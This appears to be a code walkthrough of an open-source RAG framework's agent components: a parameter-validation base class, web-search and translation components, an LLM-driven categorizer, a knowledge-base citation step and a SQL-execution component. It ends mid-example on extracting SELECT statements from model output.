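    # q/from/to/appid/salt/sign together form the query string sent to
    # http://api.fanyi.baidu.com/api/trans/vip/translate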
agent/component/base.py (new file, 492 lines)
@@ -0,0 +1,492 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import builtins
import json
import os
from copy import deepcopy
from functools import partial
from typing import List, Dict, Tuple, Union

import pandas as pd

from agent import settings
from agent.settings import flow_logger, DEBUG

_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
_DEPRECATED_PARAMS = "_deprecated_params"
_USER_FEEDED_PARAMS = "_user_feeded_params"
_IS_RAW_CONF = "_is_raw_conf"


class ComponentParamBase(ABC):
    def __init__(self):
        self.output_var_name = "output"
        self.message_history_window_size = 22

    def set_name(self, name: str):
        self._name = name
        return self

    def check(self):
        raise NotImplementedError("Parameter Object should be checked.")

    @classmethod
    def _get_or_init_deprecated_params_set(cls):
        if not hasattr(cls, _DEPRECATED_PARAMS):
            setattr(cls, _DEPRECATED_PARAMS, set())
        return getattr(cls, _DEPRECATED_PARAMS)

    def _get_or_init_feeded_deprecated_params_set(self, conf=None):
        if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
            if conf is None:
                setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
            else:
                setattr(
                    self,
                    _FEEDED_DEPRECATED_PARAMS,
                    set(conf[_FEEDED_DEPRECATED_PARAMS]),
                )
        return getattr(self, _FEEDED_DEPRECATED_PARAMS)

    def _get_or_init_user_feeded_params_set(self, conf=None):
        if not hasattr(self, _USER_FEEDED_PARAMS):
            if conf is None:
                setattr(self, _USER_FEEDED_PARAMS, set())
            else:
                setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
        return getattr(self, _USER_FEEDED_PARAMS)

    def get_user_feeded(self):
        return self._get_or_init_user_feeded_params_set()

    def get_feeded_deprecated_params(self):
        return self._get_or_init_feeded_deprecated_params_set()

    @property
    def _deprecated_params_set(self):
        return {name: True for name in self.get_feeded_deprecated_params()}

    def __str__(self):
        return json.dumps(self.as_dict(), ensure_ascii=False)

    def as_dict(self):
        def _recursive_convert_obj_to_dict(obj):
            ret_dict = {}
            for attr_name in list(obj.__dict__):
                if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
                    continue
                # get attr
                attr = getattr(obj, attr_name)
                if isinstance(attr, pd.DataFrame):
                    ret_dict[attr_name] = attr.to_dict()
                    continue
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
                else:
                    ret_dict[attr_name] = attr

            return ret_dict

        return _recursive_convert_obj_to_dict(self)

    def update(self, conf, allow_redundant=False):
        update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
        if update_from_raw_conf:
            deprecated_params_set = self._get_or_init_deprecated_params_set()
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set()
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set()
            setattr(self, _IS_RAW_CONF, False)
        else:
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set(conf)
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)

        def _recursive_update_param(param, config, depth, prefix):
            if depth > settings.PARAM_MAXDEPTH:
                raise ValueError("Param definition is nested too deeply; cannot parse it.")

            inst_variables = param.__dict__
            redundant_attrs = []
            for config_key, config_value in config.items():
                # attribute not declared on the param object: set it anyway
                if config_key not in inst_variables:
                    setattr(param, config_key, config_value)
                    # redundant_attrs.append(config_key)
                    continue

                full_config_key = f"{prefix}{config_key}"

                if update_from_raw_conf:
                    # record user-fed params
                    user_feeded_params_set.add(full_config_key)

                    # update the user-fed deprecated param set
                    if full_config_key in deprecated_params_set:
                        feeded_deprecated_params_set.add(full_config_key)

                # supported attr
                attr = getattr(param, config_key)
                if type(attr).__name__ in dir(builtins) or attr is None:
                    setattr(param, config_key, config_value)
                else:
                    # recursively set object attributes
                    sub_params = _recursive_update_param(
                        attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
                    )
                    setattr(param, config_key, sub_params)

            if not allow_redundant and redundant_attrs:
                raise ValueError(
                    f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
                )

            return param

        return _recursive_update_param(param=self, config=conf, depth=0, prefix="")

    def extract_not_builtin(self):
        def _get_not_builtin_types(obj):
            ret_dict = {}
            for variable in obj.__dict__:
                attr = getattr(obj, variable)
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[variable] = _get_not_builtin_types(attr)

            return ret_dict

        return _get_not_builtin_types(self)

    def validate(self):
        self.builtin_types = dir(builtins)
        self.func = {
            "ge": self._greater_equal_than,
            "le": self._less_equal_than,
            "in": self._in,
            "not_in": self._not_in,
            "range": self._range,
        }
        home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
        param_validation_path_prefix = home_dir + "/param_validation/"

        param_name = type(self).__name__
        param_validation_path = "/".join(
            [param_validation_path_prefix, param_name + ".json"]
        )

        validation_json = None

        try:
            with open(param_validation_path, "r") as fin:
                validation_json = json.loads(fin.read())
        except BaseException:
            return

        self._validate_param(self, validation_json)

    def _validate_param(self, param_obj, validation_json):
        default_section = type(param_obj).__name__
        var_list = param_obj.__dict__

        for variable in var_list:
            attr = getattr(param_obj, variable)

            if type(attr).__name__ in self.builtin_types or attr is None:
                if variable not in validation_json:
                    continue

                validation_dict = validation_json[default_section][variable]
                value = getattr(param_obj, variable)
                value_legal = False

                for op_type in validation_dict:
                    if self.func[op_type](value, validation_dict[op_type]):
                        value_legal = True
                        break

                if not value_legal:
                    raise ValueError(
                        "Please check the runtime conf: {} = {} does not match the user-parameter restriction".format(
                            variable, value
                        )
                    )

            elif variable in validation_json:
                self._validate_param(attr, validation_json)

    @staticmethod
    def check_string(param, descr):
        if type(param).__name__ not in ["str"]:
            raise ValueError(
                descr + " {} not supported, should be string type".format(param)
            )

    @staticmethod
    def check_empty(param, descr):
        if not param:
            raise ValueError(
                descr + " does not support empty value."
            )

    @staticmethod
    def check_positive_integer(param, descr):
        if type(param).__name__ not in ["int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive integer".format(param)
            )

    @staticmethod
    def check_positive_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive numeric".format(param)
            )

    @staticmethod
    def check_nonnegative_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param < 0:
            raise ValueError(
                descr
                + " {} not supported, should be non-negative numeric".format(param)
            )

    @staticmethod
    def check_decimal_float(param, descr):
        if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
            raise ValueError(
                descr
                + " {} not supported, should be a float number in range [0, 1]".format(
                    param
                )
            )

    @staticmethod
    def check_boolean(param, descr):
        if type(param).__name__ != "bool":
            raise ValueError(
                descr + " {} not supported, should be bool type".format(param)
            )

    @staticmethod
    def check_open_unit_interval(param, descr):
        if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
            raise ValueError(
                descr + " should be a numeric number between 0 and 1 exclusively"
            )

    @staticmethod
    def check_valid_value(param, descr, valid_values):
        if param not in valid_values:
            raise ValueError(
                descr
                + " {} is not supported, it should be in {}".format(param, valid_values)
            )

    @staticmethod
    def check_defined_type(param, descr, types):
        if type(param).__name__ not in types:
            raise ValueError(
                descr + " {} not supported, should be one of {}".format(param, types)
            )

    @staticmethod
    def check_and_change_lower(param, valid_list, descr=""):
        if type(param).__name__ != "str":
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

        lower_param = param.lower()
        if lower_param in valid_list:
            return lower_param
        else:
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

    @staticmethod
    def _greater_equal_than(value, limit):
        return value >= limit - settings.FLOAT_ZERO

    @staticmethod
    def _less_equal_than(value, limit):
        return value <= limit + settings.FLOAT_ZERO

    @staticmethod
    def _range(value, ranges):
        in_range = False
        for left_limit, right_limit in ranges:
            if (
                    left_limit - settings.FLOAT_ZERO
                    <= value
                    <= right_limit + settings.FLOAT_ZERO
            ):
                in_range = True
                break

        return in_range

    @staticmethod
    def _in(value, right_value_list):
        return value in right_value_list

    @staticmethod
    def _not_in(value, wrong_value_list):
        return value not in wrong_value_list

    def _warn_deprecated_param(self, param_name, descr):
        if self._deprecated_params_set.get(param_name):
            flow_logger.warning(
                f"{descr} {param_name} is deprecated and ignored in this version."
            )

    def _warn_to_deprecate_param(self, param_name, descr, new_param):
        if self._deprecated_params_set.get(param_name):
            flow_logger.warning(
                f"{descr} {param_name} will be deprecated in future release; "
                f"please use {new_param} instead."
            )
            return True
        return False


class ComponentBase(ABC):
    component_name: str

    def __str__(self):
        """
        {
            "component_name": "Begin",
            "params": {}
        }
        """
        return """{{
            "component_name": "{}",
            "params": {}
        }}""".format(self.component_name,
                     self._param
                     )

    def __init__(self, canvas, id, param: ComponentParamBase):
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()

    def run(self, history, **kwargs):
        flow_logger.info("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
                                                              json.dumps(kwargs, ensure_ascii=False)))
        try:
            res = self._run(history, **kwargs)
            self.set_output(res)
        except Exception as e:
            self.set_output(pd.DataFrame([{"content": str(e)}]))
            raise e

        return res

    def _run(self, history, **kwargs):
        raise NotImplementedError()

    def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
        o = getattr(self._param, self._param.output_var_name)
        if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
            if not isinstance(o, list): o = [o]
            o = pd.DataFrame(o)

        if allow_partial or not isinstance(o, partial):
            return self._param.output_var_name, o

        # drain the partial (a stream-generator factory) into a DataFrame
        outs = None
        for oo in o():
            if not isinstance(oo, pd.DataFrame):
                outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
            else: outs = oo
        return self._param.output_var_name, outs

    def reset(self):
        setattr(self._param, self._param.output_var_name, None)

    def set_output(self, v: pd.DataFrame):
        setattr(self._param, self._param.output_var_name, v)

    def get_input(self):
        upstream_outs = []
        reversed_cpnts = []
        if len(self._canvas.path) > 1:
            reversed_cpnts.extend(self._canvas.path[-2])
        reversed_cpnts.extend(self._canvas.path[-1])

        if DEBUG: print(self.component_name, reversed_cpnts[::-1])
        for u in reversed_cpnts[::-1]:
            if self.get_component_name(u) in ["switch"]: continue
            if self.component_name.lower() == "generate" and self.get_component_name(u) == "retrieval":
                o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
                if o is not None:
                    upstream_outs.append(o)
                continue
            if u not in self._canvas.get_component(self._id)["upstream"]: continue
            if self.component_name.lower().find("switch") < 0 \
                    and self.get_component_name(u) in ["relevant", "categorize"]:
                continue
            if u.lower().find("answer") >= 0:
                for r, c in self._canvas.history[::-1]:
                    if r == "user":
                        upstream_outs.append(pd.DataFrame([{"content": c}]))
                        break
                break
            if self.component_name.lower().find("answer") >= 0 and self.get_component_name(u) in ["relevant"]:
                continue
            o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
            if o is not None:
                upstream_outs.append(o)
            break

        if upstream_outs:
            df = pd.concat(upstream_outs, ignore_index=True)
            if "content" in df:
                df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
            return df
        return pd.DataFrame()

    def get_stream_input(self):
        reversed_cpnts = []
        if len(self._canvas.path) > 1:
            reversed_cpnts.extend(self._canvas.path[-2])
        reversed_cpnts.extend(self._canvas.path[-1])

        for u in reversed_cpnts[::-1]:
            if self.get_component_name(u) in ["switch", "answer"]: continue
            return self._canvas.get_component(u)["obj"].output()[1]

    @staticmethod
    def be_output(v):
        return pd.DataFrame([{"content": v}])

    def get_component_name(self, cpn_id):
        return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
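To see how the pieces of ComponentParamBase fit together, here is a hedged sketch of the update/check/as_dict flow on a toy subclass; DemoParam is hypothetical, update() recursively copies config keys onto the instance, and check() uses the validators defined above:

    from agent.component.base import ComponentParamBase

    class DemoParam(ComponentParamBase):
        def __init__(self):
            super().__init__()
            self.top_n = 10

        def check(self):
            self.check_positive_integer(self.top_n, "Top N")

    p = DemoParam()
    p.update({"top_n": 5})        # copies the raw config onto the instance
    p.check()                     # raises ValueError if top_n is not a positive int
    print(p.as_dict()["top_n"])   # -> 5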
agent/component/begin.py (new file, 48 lines)
@@ -0,0 +1,48 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from functools import partial
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase


class BeginParam(ComponentParamBase):
    """
    Define the Begin component parameters.
    """

    def __init__(self):
        super().__init__()
        self.prologue = "Hi! I'm your smart assistant. What can I do for you?"

    def check(self):
        return True


class Begin(ComponentBase):
    component_name = "Begin"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)
        return pd.DataFrame([{"content": self._param.prologue}])

    def stream_output(self):
        res = {"content": self._param.prologue}
        yield res
        self.set_output(res)
agent/component/bing.py (new file, 85 lines)
@@ -0,0 +1,85 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import requests
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class BingParam(ComponentParamBase):
    """
    Define the Bing component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.channel = "Webpages"
        self.api_key = "YOUR_ACCESS_KEY"
        self.country = "CN"
        self.language = "en"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Bing Web Search or Bing News", ["Webpages", "News"])
        self.check_empty(self.api_key, "Bing subscription key")
        self.check_valid_value(self.country, "Bing Country",
                               ['AR', 'AU', 'AT', 'BE', 'BR', 'CA', 'CL', 'DK', 'FI', 'FR', 'DE', 'HK', 'IN', 'ID',
                                'IT', 'JP', 'KR', 'MY', 'MX', 'NL', 'NZ', 'NO', 'CN', 'PL', 'PT', 'PH', 'RU', 'SA',
                                'ZA', 'ES', 'SE', 'CH', 'TW', 'TR', 'GB', 'US'])
        self.check_valid_value(self.language, "Bing Languages",
                               ['ar', 'eu', 'bn', 'bg', 'ca', 'ns', 'nt', 'hr', 'cs', 'da', 'nl', 'en', 'gb', 'et',
                                'fi', 'fr', 'gl', 'de', 'gu', 'he', 'hi', 'hu', 'is', 'it', 'jp', 'kn', 'ko', 'lv',
                                'lt', 'ms', 'ml', 'mr', 'nb', 'pl', 'br', 'pt', 'pa', 'ro', 'ru', 'sr', 'sk', 'sl',
                                'es', 'sv', 'ta', 'te', 'th', 'tr', 'uk', 'vi'])


class Bing(ComponentBase, ABC):
    component_name = "Bing"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Bing.be_output("")

        try:
            headers = {"Ocp-Apim-Subscription-Key": self._param.api_key, 'Accept-Language': self._param.language}
            params = {"q": ans, "textDecorations": True, "textFormat": "HTML", "cc": self._param.country,
                      "answerCount": 1, "promote": self._param.channel}
            if self._param.channel == "Webpages":
                response = requests.get("https://api.bing.microsoft.com/v7.0/search", headers=headers, params=params)
                response.raise_for_status()
                search_results = response.json()
                bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["snippet"]} for i in
                            search_results["webPages"]["value"]]
            elif self._param.channel == "News":
                response = requests.get("https://api.bing.microsoft.com/v7.0/news/search", headers=headers,
                                        params=params)
                response.raise_for_status()
                search_results = response.json()
                bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["description"]} for i
                            in search_results['news']['value']]
        except Exception as e:
            return Bing.be_output("**ERROR**: " + str(e))

        if not bing_res:
            return Bing.be_output("")

        df = pd.DataFrame(bing_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df
agent/component/categorize.py (new file, 87 lines)
@@ -0,0 +1,87 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from agent.settings import DEBUG


class CategorizeParam(GenerateParam):
    """
    Define the Categorize component parameters.
    """

    def __init__(self):
        super().__init__()
        self.category_description = {}
        self.prompt = ""

    def check(self):
        super().check()
        self.check_empty(self.category_description, "[Categorize] Category examples")
        for k, v in self.category_description.items():
            if not k:
                raise ValueError("[Categorize] Category name can not be empty!")
            if not v.get("to"):
                raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")

    def get_prompt(self):
        cate_lines = []
        for c, desc in self.category_description.items():
            for line in desc.get("examples", "").split("\n"):
                if not line:
                    continue
                cate_lines.append("Question: {}\tCategory: {}".format(line, c))
        descriptions = []
        for c, desc in self.category_description.items():
            if desc.get("description"):
                descriptions.append(
                    "--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))

        self.prompt = """
        You're a text classifier. You need to categorize the user's questions into {} categories,
        namely: {}
        Here's the description of each category:
        {}

        You could learn from the following examples:
        {}
        Just mention the category names, no need for any additional words.
        """.format(
            len(self.category_description.keys()),
            "/".join(list(self.category_description.keys())),
            "\n".join(descriptions),
            "- ".join(cate_lines)
        )
        return self.prompt


class Categorize(Generate, ABC):
    component_name = "Categorize"

    def _run(self, history, **kwargs):
        input = self.get_input()
        input = "Question: " + ("; ".join(input["content"]) if "content" in input else "") + "Category: "
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": input}],
                            self._param.gen_conf())
        if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::", input)
        for c in self._param.category_description.keys():
            if ans.lower().find(c.lower()) >= 0:
                return Categorize.be_output(self._param.category_description[c]["to"])

        return Categorize.be_output(list(self._param.category_description.items())[-1][1]["to"])
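A hedged sketch of the category_description shape that CategorizeParam expects: each entry carries a description, newline-separated examples, and a "to" component id to route to. All names below are hypothetical:

    desc = {
        "product": {"description": "Questions about product usage",
                    "examples": "How do I install it?\nWhere is the config file?",
                    "to": "generate:product_qa"},
        "chitchat": {"description": "Greetings and small talk",
                     "examples": "hi\nhow are you",
                     "to": "generate:chitchat"},
    }
    # param.category_description = desc; param.get_prompt() renders the classifier
    # prompt, and Categorize._run routes to desc[category]["to"].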
agent/component/cite.py (new file, 75 lines)
@@ -0,0 +1,75 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC

import pandas as pd

from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase


class CiteParam(ComponentParamBase):
    """
    Define the Cite component parameters.
    """

    def __init__(self):
        super().__init__()
        self.cite_sources = []

    def check(self):
        self.check_empty(self.cite_sources, "Please specify where you want to cite from.")


class Cite(ComponentBase, ABC):
    component_name = "Cite"

    def _run(self, history, **kwargs):
        input = "\n- ".join(self.get_input()["content"])
        sources = [self._canvas.get_component(cpn_id).output()[1] for cpn_id in self._param.cite_sources]
        query = []
        for role, cnt in history[::-1][:self._param.message_history_window_size]:
            if role != "user":
                continue
            query.append(cnt)
        query = "\n".join(query)

        kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
        if not kbs:
            raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."

        embd_mdl = LLMBundle(kbs[0].tenant_id, LLMType.EMBEDDING, embd_nms[0])

        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)

        kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
                                        1, self._param.top_n,
                                        self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
                                        aggs=False, rerank_mdl=rerank_mdl)

        if not kbinfos["chunks"]:
            return pd.DataFrame()
        df = pd.DataFrame(kbinfos["chunks"])
        df["content"] = df["content_with_weight"]
        del df["content_with_weight"]
        return df
agent/component/deepl.py (new file, 62 lines)
@@ -0,0 +1,62 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import re
from agent.component.base import ComponentBase, ComponentParamBase
import deepl


class DeepLParam(ComponentParamBase):
    """
    Define the DeepL component parameters.
    """

    def __init__(self):
        super().__init__()
        self.auth_key = "xxx"
        self.parameters = []
        self.source_lang = 'ZH'
        self.target_lang = 'EN-GB'

    def check(self):
        self.check_empty(self.auth_key, "DeepL auth key")
        self.check_valid_value(self.source_lang, "Source language",
                               ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN', 'ES', 'ET', 'FI', 'FR', 'HU', 'ID', 'IT',
                                'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT', 'RO', 'RU', 'SK', 'SL', 'SV', 'TR',
                                'UK', 'ZH'])
        self.check_valid_value(self.target_lang, "Target language",
                               ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN-GB', 'EN-US', 'ES', 'ET', 'FI', 'FR', 'HU',
                                'ID', 'IT', 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT-BR', 'PT-PT', 'RO', 'RU',
                                'SK', 'SL', 'SV', 'TR', 'UK', 'ZH'])


class DeepL(ComponentBase, ABC):
    component_name = "DeepL"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return DeepL.be_output("")

        try:
            translator = deepl.Translator(self._param.auth_key)
            result = translator.translate_text(ans, source_lang=self._param.source_lang,
                                               target_lang=self._param.target_lang)

            return DeepL.be_output(result.text)
        except Exception as e:
            return DeepL.be_output("**Error**:" + str(e))
agent/component/duckduckgo.py (new file, 66 lines)
@@ -0,0 +1,66 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from duckduckgo_search import DDGS
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class DuckDuckGoParam(ComponentParamBase):
    """
    Define the DuckDuckGo component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.channel = "text"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])


class DuckDuckGo(ComponentBase, ABC):
    component_name = "DuckDuckGo"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return DuckDuckGo.be_output("")

        try:
            if self._param.channel == "text":
                with DDGS() as ddgs:
                    # each result: {'title': '', 'href': '', 'body': ''}
                    duck_res = [{"content": '<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"]} for i
                                in ddgs.text(ans, max_results=self._param.top_n)]
            elif self._param.channel == "news":
                with DDGS() as ddgs:
                    # each result: {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
                    duck_res = [{"content": '<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"]} for i
                                in ddgs.news(ans, max_results=self._param.top_n)]
        except Exception as e:
            return DuckDuckGo.be_output("**ERROR**: " + str(e))

        if not duck_res:
            return DuckDuckGo.be_output("")

        df = pd.DataFrame(duck_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df
agent/component/exesql.py (new file, 99 lines)
@@ -0,0 +1,99 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import re
import pandas as pd
from peewee import MySQLDatabase, PostgresqlDatabase
from agent.component.base import ComponentBase, ComponentParamBase


class ExeSQLParam(ComponentParamBase):
    """
    Define the ExeSQL component parameters.
    """

    def __init__(self):
        super().__init__()
        self.db_type = "mysql"
        self.database = ""
        self.username = ""
        self.host = ""
        self.port = 3306
        self.password = ""
        self.loop = 3
        self.top_n = 30

    def check(self):
        self.check_valid_value(self.db_type, "Choose DB type", ['mysql', 'postgresql', 'mariadb'])
        self.check_empty(self.database, "Database name")
        self.check_empty(self.username, "Database username")
        self.check_empty(self.host, "IP address")
        self.check_positive_integer(self.port, "IP port")
        self.check_empty(self.password, "Database password")
        self.check_positive_integer(self.top_n, "Number of records")


class ExeSQL(ComponentBase, ABC):
    component_name = "ExeSQL"

    def _run(self, history, **kwargs):
        if not hasattr(self, "_loop"):
            setattr(self, "_loop", 0)
        if self._loop >= self._param.loop:
            self._loop = 0
            raise Exception("Maximum loop count exceeded. Can't fetch the correct data via the SQL statement.")
        self._loop += 1

        ans = self.get_input()
        ans = "".join(ans["content"]) if "content" in ans else ""
        # carve the bare SELECT statement(s) out of a possibly chatty LLM answer
        ans = re.sub(r'^.*?SELECT ', 'SELECT ', repr(ans), flags=re.IGNORECASE)
        ans = re.sub(r';.*?SELECT ', '; SELECT ', ans, flags=re.IGNORECASE)
        ans = re.sub(r';[^;]*$', r';', ans)
        if not ans:
            raise Exception("SQL statement not found!")

        if self._param.db_type in ["mysql", "mariadb"]:
            db = MySQLDatabase(self._param.database, user=self._param.username, host=self._param.host,
                               port=self._param.port, password=self._param.password)
        elif self._param.db_type == 'postgresql':
            db = PostgresqlDatabase(self._param.database, user=self._param.username, host=self._param.host,
                                    port=self._param.port, password=self._param.password)

        try:
            db.connect()
        except Exception as e:
            raise Exception("Database connection failed! \n" + str(e))
        sql_res = []
        for single_sql in re.split(r';', ans.replace(r"\n", " ")):
            if not single_sql:
                continue
            try:
                query = db.execute_sql(single_sql)
                if query.rowcount == 0:
                    sql_res.append({"content": "\nTotal: " + str(query.rowcount) + "\n No record in the database!"})
                    continue
                single_res = pd.DataFrame([i for i in query.fetchmany(size=self._param.top_n)])
                single_res.columns = [i[0] for i in query.description]
                sql_res.append({"content": "\nTotal: " + str(query.rowcount) + "\n" + single_res.to_markdown()})
            except Exception as e:
                sql_res.append({"content": "**Error**:" + str(e) + "\nError SQL Statement:" + single_sql})
        db.close()

        if not sql_res:
            return ExeSQL.be_output("")

        return pd.DataFrame(sql_res)
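The three substitutions above carve a bare SELECT statement out of a chatty LLM answer; a quick trace on a typical reply (note that repr() first turns the raw string, newlines included, into a single escaped line):

    import re

    ans = "Sure! Here is the query:\nSELECT id, name FROM users LIMIT 3; hope it helps"
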